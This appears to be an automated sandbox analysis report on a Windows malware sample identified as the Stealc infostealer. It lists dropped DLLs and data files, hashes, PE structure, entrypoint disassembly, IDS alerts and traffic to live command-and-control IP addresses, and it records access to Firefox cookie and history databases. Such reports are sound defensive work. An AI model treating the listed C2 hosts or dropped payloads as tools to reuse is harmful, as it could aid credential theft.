Preview:	......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t

C:\Users\user\AppData\Local\Temp\u5g0.3.exe

Download File

Process:	C:\Users\user\Desktop\R0hb7jyBcv.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4866096
Entropy (8bit):	6.542818068158205
Encrypted:	false
SSDEEP:	49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
MD5:	397926927BCA55BE4A77839B1C44DE6E
SHA1:	E10F3434EF3021C399DBBA047832F02B3C898DBD
SHA-256:	4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
SHA-512:	CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......\|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1640960
Entropy (8bit):	6.484662993855079
Encrypted:	false
SSDEEP:	49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
MD5:	D1BA9412E78BFC98074C5D724A1A87D6
SHA1:	0572F98D78FB0B366B5A086C2A74CC68B771D368
SHA-256:	CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
SHA-512:	8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\bunch.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1329417
Entropy (8bit):	7.898171122766659
Encrypted:	false
SSDEEP:	24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
MD5:	1E8237D3028AB52821D69099E0954F97
SHA1:	30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
SHA-256:	9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
SHA-512:	A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
Malicious:	false
Preview:	...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O

C:\Users\user\AppData\Roaming\SecureClient\relay.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1596416
Entropy (8bit):	6.46619614175955
Encrypted:	false
SSDEEP:	49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
MD5:	10D51BECD0BBCE0FAB147FF9658C565E
SHA1:	4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
SHA-256:	7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
SHA-512:	29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..\|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\whale.dbf

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	87278
Entropy (8bit):	4.38402884518968
Encrypted:	false
SSDEEP:	1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
MD5:	A723BF46048E0BFB15B8D77D7A648C3E
SHA1:	8952D3C34E9341E4425571E10F22B782695BB915
SHA-256:	B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
SHA-512:	CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
Malicious:	false
Preview:	......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468177544668468
Encrypted:	false
SSDEEP:	6144:wIXfpi67eLPU9skLmb0b44WSPKaJG8nAgejZMMhA2gX4WABl0uNMdwBCswSbj:VXD944WlLZMM6YFHC+j
MD5:	020F0452259887A18D343300AB61C4E5
SHA1:	458A51CBF970FAA3C747B66EB536AC57E7C09CF1
SHA-256:	3FEADACC9ED348BC9C8097CCC889A8B8C702685DC844F8BC5B3F106B1260089B
SHA-512:	4C51FE14E33D34A40AE5F18165C3CF8CE894BDA8BF6C0435714557C2CC078CEDD6146A71B5F1A7481CA0621E3B75616418CD7933B185C8E7B68ACADD1E072D9E
Malicious:	false
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....................................................................................................................................................................................................................................................................................................................................................@..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.613732663507278
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	R0hb7jyBcv.exe
File size:	421'377 bytes
MD5:	74e9f3ba74c619021b87520b083c6a1d
SHA1:	72db70927e2be7ce030ecb812b9ea241b46d7ad0
SHA256:	47307dc63a88e7e1ba5eb0230a0ac39092bd5c284896909d5e9f274f47939483
SHA512:	1c8a4b3babdbedf0e9159c6a17e92ad5f1c9ae478d099771b2e775c40ea067cbfc4896d4847a58451484c5500c4df82a979562c944a4fff0c1bea15a841cf120
SSDEEP:	6144:I+x1ShTyz9EqOq21LVVb7ZpK2FoICp+fGqhDbSe8Lbp779ZLzW6Y:9xo2X2xV1ZpKJICpZqR2bdhc6Y
TLSH:	CE94E01071E0C836DEAA5B714A75D2E0563EBD6277F5818FB2D83B5F6E332909A31306
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............x.L.x.L.x.L.OL.x.L.YL.x.L.^L.x.L...L.x.L.x.L.x.L.PL.x.L.NL.x.L.KL.x.LRich.x.L................PE..L......d...........

File Icon


Icon Hash:	67376767d3371667

Static PE Info

General

Entrypoint:	0x40164c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x64C5E6E2 [Sun Jul 30 04:28:18 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	5e92d30764e747854cc6239c62c56f52

Entrypoint Preview

Instruction
call 00007F38BC860344h
jmp 00007F38BC85C61Dh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007F38BC85C7C6h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007F38BC85C7F0h
test ecx, 00000003h
jne 00007F38BC85C791h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007F38BC85C78Ah
mov eax, dword ptr [ecx-04h]
test al, al
je 00007F38BC85C7D4h
test ah, ah
je 00007F38BC85C7C6h
test eax, 00FF0000h
je 00007F38BC85C7B5h
test eax, FF000000h
je 00007F38BC85C7A4h
jmp 00007F38BC85C76Fh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 0040C204h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007F38BC85C7AEh

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x57edc	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x45b000	0xd1dd	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x57758	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc000	0x188	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa6d3	0xa800	8724c8e9da6919185e485c776b471cf1	False	0.6148158482142857	data	6.536905252650404	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xc000	0x4c7e4	0x4c800	bb35b09a20539e60fb247fa63e2aab4c	False	0.7521924785539216	data	6.853347706467387	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x59000	0x4019a8	0x2800	d823c9c81ca53db093ddfccd5ee9d0f0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x45b000	0xd1dd	0xd200	8900fd7e5ef65429eed7195847d35a9b	False	0.33872767857142855	data	4.316142307164868	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x45b5c8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4276315789473684
RT_CURSOR	0x45b6f8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x45b828	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_CURSOR	0x45ddd0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.31023454157782515
RT_CURSOR	0x45ec78	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x45eda8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_ICON	0x461350	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.4312366737739872
RT_ICON	0x4621f8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5672382671480144
RT_ICON	0x462aa0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6319124423963134
RT_ICON	0x463168	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6777456647398844
RT_ICON	0x4636d0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.5189834024896266
RT_ICON	0x465c78	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.5905737704918033
RT_ICON	0x466600	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.6179078014184397
RT_STRING	0x466a68	0xd2	data	Turkish	Turkey	0.5523809523809524
RT_STRING	0x466b3c	0x54e	data	Turkish	Turkey	0.44550810014727543
RT_STRING	0x46708c	0xf8	data	Turkish	Turkey	0.5564516129032258
RT_STRING	0x467184	0x7dc	data	Turkish	Turkey	0.4150099403578529
RT_STRING	0x467960	0x15c	data	Turkish	Turkey	0.5229885057471264
RT_STRING	0x467abc	0xdc	data	Turkish	Turkey	0.55
RT_STRING	0x467b98	0x12a	data	Turkish	Turkey	0.5167785234899329
RT_GROUP_CURSOR	0x467cc4	0x14	data			1.15
RT_GROUP_CURSOR	0x467cd8	0x22	data			1.088235294117647
RT_GROUP_CURSOR	0x467cfc	0x14	data			1.25
RT_GROUP_CURSOR	0x467d10	0x22	data			1.088235294117647
RT_GROUP_ICON	0x467d34	0x68	data	Turkish	Turkey	0.7115384615384616
RT_VERSION	0x467d9c	0x1e0	data			0.5708333333333333
RT_MANIFEST	0x467f7c	0x261	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (549), with CRLF line terminators			0.5451559934318555

Imports

DLL	Import
KERNEL32.dll	GetConsoleAliasExesLengthA, GetCommState, GetModuleHandleW, GetProcessHeap, GetDateFormatA, GlobalAlloc, LoadLibraryW, HeapDestroy, IsBadWritePtr, GetModuleFileNameW, GlobalUnfix, GetProcAddress, SetFirmwareEnvironmentVariableW, LoadLibraryA, GetLocaleInfoA, SetConsoleDisplayMode, SetCurrentDirectoryW, WaitForMultipleObjects, SetConsoleTitleW, FreeEnvironmentStringsW, BuildCommDCBA, VirtualProtect, GetCurrentDirectoryA, FindAtomW, FileTimeToLocalFileTime, SetFileAttributesW, GetVolumeInformationW, GetFileType, EnumCalendarInfoA, CloseHandle, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, HeapFree, EnterCriticalSection, LeaveCriticalSection, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, VirtualAlloc, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, FlushFileBuffers, CreateFileA
USER32.dll	GetProcessDefaultLayout
ADVAPI32.dll	ReadEventLogA
ole32.dll	CoTaskMemFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/25/24-12:16:10.180353	TCP	2044243	ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in	49734	80	192.168.2.4	185.172.128.76
04/25/24-12:16:10.669378	TCP	2044244	ET TROJAN Win32/Stealc Requesting browsers Config from C2	49734	80	192.168.2.4	185.172.128.76
04/25/24-12:16:03.873014	TCP	2856233	ETPRO TROJAN Win32/Unknown Loader Related Activity (GET)	49730	80	192.168.2.4	185.172.128.90
04/25/24-12:16:10.991630	TCP	2051828	ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1	80	49734	185.172.128.76	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 12:15:56.489692926 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 25, 2024 12:16:03.666116953 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 25, 2024 12:16:03.872795105 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 25, 2024 12:16:03.872944117 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 25, 2024 12:16:03.873013973 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 25, 2024 12:16:04.079346895 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 25, 2024 12:16:05.606241941 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 25, 2024 12:16:05.607161999 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 25, 2024 12:16:05.619216919 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 25, 2024 12:16:05.830159903 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 25, 2024 12:16:05.830399036 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 25, 2024 12:16:05.830466986 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 25, 2024 12:16:06.041277885 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 25, 2024 12:16:06.041737080 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 25, 2024 12:16:06.051680088 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 25, 2024 12:16:06.062519073 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.098887920 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 25, 2024 12:16:06.270220995 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.270526886 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.270526886 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.478319883 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.478562117 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.478599072 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.478641987 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.478660107 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.478673935 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.478687048 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.478709936 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.478759050 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.478799105 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.478830099 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.478879929 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.478893042 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.478914976 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.478935957 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.478986025 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.686522961 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.686539888 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.686553001 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.686564922 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.686578035 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.686602116 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 12:16:06.686611891 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 12:16:06.686625957 CEST	80	49732	185.172.128.59	192.168.2.4
